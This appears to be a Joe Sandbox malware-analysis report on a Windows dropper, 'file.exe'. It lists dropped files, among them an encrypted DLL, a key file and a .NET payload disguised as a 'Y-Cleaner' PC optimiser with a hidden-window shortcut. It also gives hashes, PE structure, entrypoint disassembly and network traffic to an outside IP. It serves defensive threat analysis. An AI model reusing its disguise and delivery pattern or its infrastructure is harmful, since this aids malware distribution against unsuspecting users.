Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Jl.X...........!..................... ........... ....................... ............@.....................................W.................................................................................... ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........`..4e...........U..............................................}.Y.y.=.{.X.x.=..r...p.o2....o...(3.....o2...}....:..s.....(...........2r...p(;...&Vr...p.....r...p.......(....>.........}.......(C.....o...(D...(E...}.....(F...(E...(G...&>.........}.......(C.....o...(D...}.....(F...(E...(H...&".......>.........}....R..} .....{ ...oo.....{ ..."..}!.....{!......}.....{#....{....op....{....,...{ ...oo.....{!...oo.....{....B.....su...(v.....{#....{#...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\download[1].htm

Process:	C:\Users\user\Desktop\file.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Preview:	0

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\fuckingdllENCR[1].dll

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	97296
Entropy (8bit):	7.9982317718947025
Encrypted:	true
SSDEEP:	1536:A1FazaNKjs9ezO6kGnCRFVjltPjM9Ew1MhiIeJfZCQdOlnq32YTCUZiyAS3tUX9F:k4zaMjVUGCRzbgqw1MoIeJyQ4nyqX9F
MD5:	E6743949BBF24B39B25399CD7C5D3A2E
SHA1:	DBE84C91A9B0ACCD2C1C16D49B48FAEAEC830239
SHA-256:	A3B82FC46635A467CC8375D40DDBDDD71CAE3B7659D2BB5C3C4370930AE9468C
SHA-512:	3D50396CDF33F5C6522D4C485D96425C0DDB341DB9BD66C43EAE6D8617B26A4D9B4B9A5AEE0457A4F1EC6FAC3CB8208C562A479DCAE024A50143CBFA4E1F15F6
Malicious:	false
Preview:	XM .4Ih..]...t.&.s...v.0{.v.vs'...:.l.h...e.....R....1...r.R+Fk....~.s.....Q.....r.T.b.....~c..[........;...j.@.0.%.....x...v.w.....<ru....Yre;.b6...HQ-...8.B..Q.a...R.:.h&r.......=.;r.k..T.@....l..;#..3!.O..x.}........y'<.GfQ.K.#.L5v..].......d....N{e..@................A\..<.t.u.X.O.n..Z.. .Xb.O<.Z...h~.(.W.f.z.V.4..L...%5.0...H..`s...y.B......(IL5s:aS}X.......M9.J.o....).'..M;n6]...W..n....)...L...._..e.....>....[....RA.........'...6.N..g6....IY.%h.. 3r....^..\.b~y./....h.2......ZLk....u}..V..<.fbD.<!.._2.zo..IE...P..O...u......P.......w#.6N..&l.R}GI...LY...N.yz..j..Hy.'..._.5..Pd9.y..+....6.q...).G.c...L#....5\.M....5U])....U(..~H.m....Y....G1.r.4.B..h........P..]i...M%.............)q......]....~\|..j...b..K!..N.7R.}T.2bsq..1...L^..!.\|q.D'...s.Ln...D@..bn%0=b.Q1.....+l...QXO\|.......NC.d......{.0....8F.....<.W.y..{o..j.3.....n..4.....eS]. K...o.B.H~.sh.1....m8....6{.ls..R..q..~....w._;....X*.#..U....6n.ODbT.+Zc....q....S.$-S`YT....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\key[1].htm

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	21
Entropy (8bit):	3.880179922675737
Encrypted:	false
SSDEEP:	3:gFsR0GOWW:gyRhI
MD5:	408E94319D97609B8E768415873D5A14
SHA1:	E1F56DE347505607893A0A1442B6F3659BEF79C4
SHA-256:	E29A4FD2CB1F367A743EA7CFD356DBD19AEB271523BBAE49D4F53257C3B0A78D
SHA-512:	994FA19673C6ADC2CC5EF31C6A5C323406BB351551219EE0EEDA4663EC32DAF2A1D14702472B5CF7B476809B088C85C5BE684916B73046DA0DF72236BC6F5608
Malicious:	false
Preview:	9tKiK3bsYm4fMuK47Pk3s

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1]

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1502720
Entropy (8bit):	7.646111739368707
Encrypted:	false
SSDEEP:	24576:7i4dHPD/8u4dJG/8yndSzGmTG2/mR2SGeYdc0GmTG2/mR6Trr2h60qP:7rPD/8I/8ly+Zrr2h60qP
MD5:	A8CF5621811F7FAC55CFE8CB3FA6B9F6
SHA1:	121356839E8138A03141F5F5856936A85BD2A474
SHA-256:	614A0362AB87CEE48D0935B5BB957D539BE1D94C6FDEB3FE42FAC4FBE182C10C
SHA-512:	4479D951435F222CA7306774002F030972C9F1715D6AAF512FCA9420DD79CB6D08240F80129F213851773290254BE34F0FF63C7B1F4D554A7DB5F84B69E84BDD
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 75%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._............"...0..0...........O... ...`....@.. .......................@............`.................................LO..O....`...................... ......0O............................................... ............... ..H............text..../... ...0.................. ..`.rsrc.......`.......2..............@..@.reloc....... ......................@..B.................O......H.......h~...D......U... .................................................(......(.....~....-.r...p.....(....o....s.........~.....~...........j(....r=..p~....o....t....j(....rM..p~....o....t....j(....r...p~....o....t....j(....r...p~....o....t....j(....r...p~....o....t....j(....r...p~....o....t....j(....r...p~....o....t.....~......(....Vs....(....t.........N.(.....(.....(........0..f.......(.........8M........o....9:....o.......o.......-a.{......<...%..o.....%.

C:\Users\user\AppData\Local\Temp\F4wAzFA73Du5NVFF3Wt42\Bunifu_UI_v1.5.3.dll

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	242176
Entropy (8bit):	6.47050397947197
Encrypted:	false
SSDEEP:	6144:SIQpxILDXGGMO7Ice9C5kQw2hWHcHTykhb:SIQpxILDXGGlET9n/cHG
MD5:	2ECB51AB00C5F340380ECF849291DBCF
SHA1:	1A4DFFBCE2A4CE65495ED79EAB42A4DA3B660931
SHA-256:	F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
SHA-512:	E241A48EAFCAF99187035F0870D24D74AE97FE84AAADD2591CCEEA9F64B8223D77CFB17A038A58EADD3B822C5201A6F7494F26EEA6F77D95F77F6C668D088E6B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Jl.X...........!..................... ........... ....................... ............@.....................................W.................................................................................... ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........`..4e...........U..............................................}.Y.y.=.{.X.x.=..r...p.o2....o...(3.....o2...}....:..s.....(...........2r...p(;...&Vr...p.....r...p.......(....>.........}.......(C.....o...(D...(E...}.....(F...(E...(G...&>.........}.......(C.....o...(D...}.....(F...(E...(H...&".......>.........}....R..} .....{ ...oo.....{ ..."..}!.....{!......}.....{#....{....op....{....,...{ ...oo.....{!...oo.....{....B.....su...(v.....{#....{#...

C:\Users\user\AppData\Local\Temp\F4wAzFA73Du5NVFF3Wt42\Y-Cleaner.exe

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1502720
Entropy (8bit):	7.646111739368707
Encrypted:	false
SSDEEP:	24576:7i4dHPD/8u4dJG/8yndSzGmTG2/mR2SGeYdc0GmTG2/mR6Trr2h60qP:7rPD/8I/8ly+Zrr2h60qP
MD5:	A8CF5621811F7FAC55CFE8CB3FA6B9F6
SHA1:	121356839E8138A03141F5F5856936A85BD2A474
SHA-256:	614A0362AB87CEE48D0935B5BB957D539BE1D94C6FDEB3FE42FAC4FBE182C10C
SHA-512:	4479D951435F222CA7306774002F030972C9F1715D6AAF512FCA9420DD79CB6D08240F80129F213851773290254BE34F0FF63C7B1F4D554A7DB5F84B69E84BDD
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 75%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._............"...0..0...........O... ...`....@.. .......................@............`.................................LO..O....`...................... ......0O............................................... ............... ..H............text..../... ...0.................. ..`.rsrc.......`.......2..............@..@.reloc....... ......................@..B.................O......H.......h~...D......U... .................................................(......(.....~....-.r...p.....(....o....s.........~.....~...........j(....r=..p~....o....t....j(....rM..p~....o....t....j(....r...p~....o....t....j(....r...p~....o....t....j(....r...p~....o....t....j(....r...p~....o....t....j(....r...p~....o....t.....~......(....Vs....(....t.........N.(.....(.....(........0..f.......(.........8M........o....9:....o.......o.......-a.{......<...%..o.....%.

C:\Users\user\Desktop\Cleaner.lnk

Process:	C:\Users\user\Desktop\file.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Fri Nov 29 19:13:20 2024, mtime=Fri Nov 29 19:13:20 2024, atime=Fri Nov 29 19:13:20 2024, length=1502720, window=hide
Category:	modified
Size (bytes):	2194
Entropy (8bit):	3.9939173497014697
Encrypted:	false
SSDEEP:	48:8ZK22yRT5629TkIvN7r2urnZkpur28myg:8V261UQN2hpZy
MD5:	C2D548CD621371D7D27E13332EF3A3CD
SHA1:	EA43F1887C2FC53AFC2585EE2641F7DF3BF38930
SHA-256:	6AB1BB43AA4723A2E2DF9C79166AD71A9B188A9CCDAA94ABA43758F41FBA461A
SHA-512:	37A2168271C787034B9474517650DEB2073A6735103C17F80E7393D1FA16F87C47F6E150ED59EDE66F4BF2DEA62DF562E74926F3E5D510AD58BC725A851EE908
Malicious:	false
Preview:	L..................F.@.. ...fzl".B....n".B....n".B..........................8.:..DG..Yr?.D..U..k0.&...&......Qg._....!!w.B....v".B......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=}Y;...........................3N.A.p.p.D.a.t.a...B.P.1.....}Y9...Local.<......EW.=}Y;............................y..L.o.c.a.l.....N.1.....}Y;...Temp..:......EW.=}Y;...........................h...T.e.m.p.....t.1.....}Y....F4WAZF~1..\......}Y..}Y......G.....................[...F.4.w.A.z.F.A.7.3.D.u.5.N.V.F.F.3.W.t.4.2.....h.2.....}Y.. .Y-CLEA~1.EXE..L......}Y..}Y......S.....................>@..Y.-.C.l.e.a.n.e.r...e.x.e.......x...............-.......w...........z.......C:\Users\user\AppData\Local\Temp\F4wAzFA73Du5NVFF3Wt42\Y-Cleaner.exe....M.a.k.e. .y.o.u.r. .P.C. .f.a.s.t.e.r.9.....\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.F.4.w.A.z.F.A.7.3.D.u.5.N.V.F.F.3.W.t.4.2.\.Y.-.C.l.e.a.n.e.r...e.x.e.H.C.:.\.U.s.e.r.s.\.F.R.O.N.T.D.~.1.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.F.

C:\Windows\appcompat\Programs\Amcache.hve

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.41652576168538
Encrypted:	false
SSDEEP:	6144:Rcifpi6ceLPL9skLmb0moSWSPtaJG8nAgex285i2MMhA20X4WABlGuN85+:ui58oSWIZBk2MM6AFBqo
MD5:	822B6E60098A71AA9F05305A48D9CBEB
SHA1:	E8BB65375AA7BCC1A1311CF91AD64EA2E518D796
SHA-256:	6EDB1E94A130B41BE4B9308157C2415BBDEA5677B25FF0C70113FD4F97E816FA
SHA-512:	6D670728D0DF7F63423043C0793F33B08E793B449E01656C016A016ED13F69265FCA46B25755BE4D59C3D672A01125752D3A65A4B7B400781899F4885FD8E8BF
Malicious:	false
Preview:	regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmN..".B..............................................................................................................................................................................................................................................................................................................................................s...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.951494510821916
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1'998'848 bytes
MD5:	f7de1701682b8875c140e8d55b51b2d6
SHA1:	42afc2d0566630d75efbada19b24fa42464c72c2
SHA256:	60deca977327bb594df9bcbbb81215761b4f84ce48c0e3243531e86e9831dca0
SHA512:	9479560b78c1d3c04ffc159b3784eba97e87eb33a276af75439cbf6227c7d8188c0c790b6aa7107b413439753c72458218783dc19243eeb6872dbbf1e7f8ec8b
SSDEEP:	49152:Wemv+WL2HkWXtTFVly45bL6e7K0yKL5vP7de06exF3h:Sv5LSpxVlX5WGKyHdjxF3
TLSH:	CB95334B6B1F6754CC9FDD3E5AC287A2F5AE7732A88552980F5393D08D126EAF08D310
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........RC..<...<...<.......<.......<.......<..~G...<...=.3.<.......<.......<.......<.Rich..<.........PE..L....[.d.................\|.

File Icon


Icon Hash:	cfa99b8a8651798d

Static PE Info

General

Entrypoint:	0x8b2000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x64C65B18 [Sun Jul 30 12:44:08 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F6E65269A6Ah
divps xmm3, dqword ptr [esi]
add byte ptr [eax], al
add byte ptr [eax], al
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
inc ecx
push bx
dec esi
dec ebp
das
xor al, 36h
dec edi
bound ecx, dword ptr [ecx+4Ah]
dec edx
insd
push edi
dec eax
dec eax
jbe 00007F6E65269AD2h
push esi
dec edx
popad
je 00007F6E65269ACBh
push edx
dec esi
jc 00007F6E65269ADAh
cmp byte ptr [ebx], dh
push edx
jns 00007F6E65269AA7h
or eax, 49674B0Ah
cmp byte ptr [edi+43h], dl
jnc 00007F6E65269AADh
bound eax, dword ptr [ecx+30h]
pop edx
inc edi
push esp
push 43473163h
aaa
push edi
dec esi
xor ebp, dword ptr [ebx+59h]
push edi
push edx
pop eax
je 00007F6E65269AB7h
xor dl, byte ptr [ebx+2Bh]
popad
jne 00007F6E65269AACh
dec eax
dec ebp
jo 00007F6E65269AA3h
xor dword ptr [edi], esi
inc esp
dec edx
dec ebp
jns 00007F6E65269AB0h
insd
jnc 00007F6E65269AD0h
aaa
inc esp
inc ecx
inc ebx
xor dl, byte ptr [ecx+4Bh]
inc edx
inc esp
bound esi, dword ptr [ebx]
or eax, 63656B0Ah
jno 00007F6E65269AB8h
push edx
insb
js 00007F6E65269AD1h
outsb
inc ecx
jno 00007F6E65269AB2h
push ebp
inc esi
pop edx
xor eax, dword ptr [ebx+36h]
push eax
aaa
imul edx, dword ptr [ebx+58h], 4Eh
aaa
inc ebx
jbe 00007F6E65269AACh
dec ebx
js 00007F6E65269AA3h
jne 00007F6E65269A91h
push esp
inc bp
outsb
inc edx
popad
dec ebx
insd
dec ebp
inc edi
xor dword ptr [ecx+36h], esp
push 0000004Bh
sub eax, dword ptr [ebp+33h]
jp 00007F6E65269ABCh
dec edx
xor bh, byte ptr [edx+56h]
bound eax, dword ptr [edi+66h]
jbe 00007F6E65269A9Ah
dec eax
or eax, 506C720Ah
aaa
xor dword ptr fs:[ebp+62h], ecx
arpl word ptr [esi], si
inc esp
jo 00007F6E65269AD3h

Rich Headers

Programming Language:

[C++] VS2008 build 21022
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6f05b	0x6f	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x66000	0x8234	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x4ad3bc	0x18	egpglfrh
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x65000	0x3ae00	68d4bd73bb7ba4481ea2339422c37fa2	False	0.9946797040870489	data	7.939044986237492	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x66000	0x8234	0x3c00	4167db5c537b26cdbcc0c97c23910206	False	0.9263020833333333	data	7.717526333130541	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x6f000	0x1000	0x200	6eb091ff88873fe4d3f846082d82dda4	False	0.154296875	data	1.0965193819233	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x70000	0x29b000	0x200	ad8581c0b7ab63b763a4c0588b98a4ea	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
egpglfrh	0x30b000	0x1a6000	0x1a5a00	51658762f84e84d0a286cee2f47289bd	False	0.9921220677067892	data	7.949780643963927	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
zosqaizp	0x4b1000	0x1000	0x600	e6abb8197a5b79beb8259b961c071cd3	False	0.5677083333333334	data	4.938320262175581	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x4b2000	0x3000	0x2200	28d2196e3cb94b7208dfcd0eb3b69958	False	0.3740808823529412	DOS executable (COM)	4.0548056142570115	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x66460	0xea8	data			1.0029317697228144
RT_CURSOR	0x67308	0x8a8	data			1.0049638989169676
RT_CURSOR	0x67bb0	0x568	data			1.0079479768786128
RT_CURSOR	0x68118	0xea8	data			1.0029317697228144
RT_CURSOR	0x68fc0	0x8a8	data			1.0049638989169676
RT_CURSOR	0x69868	0x568	data			0.5195652173913043
RT_ICON	0x4ad41c	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Tamil	India	0.7557603686635944
RT_ICON	0x4ad41c	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Tamil	Sri Lanka	0.7557603686635944
RT_ICON	0x4adae4	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Tamil	India	0.6829875518672199
RT_ICON	0x4adae4	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Tamil	Sri Lanka	0.6829875518672199
RT_ICON	0x4b008c	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Tamil	India	0.8058510638297872
RT_ICON	0x4b008c	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Tamil	Sri Lanka	0.8058510638297872
RT_STRING	0x6cea8	0x252	empty	Tamil	India	0
RT_STRING	0x6cea8	0x252	empty	Tamil	Sri Lanka	0
RT_STRING	0x6d0fc	0x396	empty	Tamil	India	0
RT_STRING	0x6d0fc	0x396	empty	Tamil	Sri Lanka	0
RT_STRING	0x6d494	0x520	empty	Tamil	India	0
RT_STRING	0x6d494	0x520	empty	Tamil	Sri Lanka	0
RT_STRING	0x6d9b4	0x3ee	empty	Tamil	India	0
RT_STRING	0x6d9b4	0x3ee	empty	Tamil	Sri Lanka	0
RT_ACCELERATOR	0x6dda4	0x58	empty	Tamil	India	0
RT_ACCELERATOR	0x6dda4	0x58	empty	Tamil	Sri Lanka	0
RT_GROUP_CURSOR	0x6ddfc	0x30	empty			0
RT_GROUP_CURSOR	0x6de2c	0x30	empty			0
RT_GROUP_ICON	0x4b04f4	0x30	data	Tamil	India	0.9375
RT_GROUP_ICON	0x4b04f4	0x30	data	Tamil	Sri Lanka	0.9375
RT_VERSION	0x4b0524	0x254	data			0.5436241610738255
RT_MANIFEST	0x4b0778	0x152	ASCII text, with CRLF line terminators			0.6479289940828402

Imports

DLL	Import
kernel32.dll	lstrcpy

Possible Origin

Language of compilation system	Country where language is spoken	Map
Tamil	India
Tamil	Sri Lanka

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 29, 2024 19:50:01.476866961 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:01.596904039 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:01.597573042 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:01.598325014 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:01.719206095 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:03.108819008 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:03.108995914 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:03.125473976 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:03.245794058 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:03.677336931 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:03.677464008 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:03.682116985 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:03.802195072 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:04.412584066 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:04.412621021 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:04.412632942 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:04.412733078 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:04.412776947 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:04.412823915 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:04.412838936 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:04.412846088 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:04.412856102 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:04.412868023 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:04.412885904 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:04.412919998 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:04.413089991 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:04.413136005 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:04.421199083 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:04.421257973 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:04.421334028 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:04.421364069 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:04.429837942 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:04.429986954 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:04.532602072 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:04.532675028 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:04.614069939 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:04.614164114 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:04.614180088 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:04.614223003 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:04.618011951 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:04.618066072 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:04.618108034 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:04.618153095 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:04.626065969 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:04.626116991 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:04.626168013 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:04.626225948 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:04.634061098 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:04.634114981 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:04.634187937 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:04.634232044 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:04.642250061 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:04.642294884 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:04.642416000 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:04.642452955 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:04.650213957 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:04.650307894 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:04.650319099 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:04.650366068 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:04.658245087 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:04.658305883 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:04.658332109 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:04.658387899 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:04.666306019 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:04.666384935 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:04.666412115 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:04.666431904 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:04.674508095 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:04.674572945 CET	49700	80	192.168.2.7	185.156.72.65
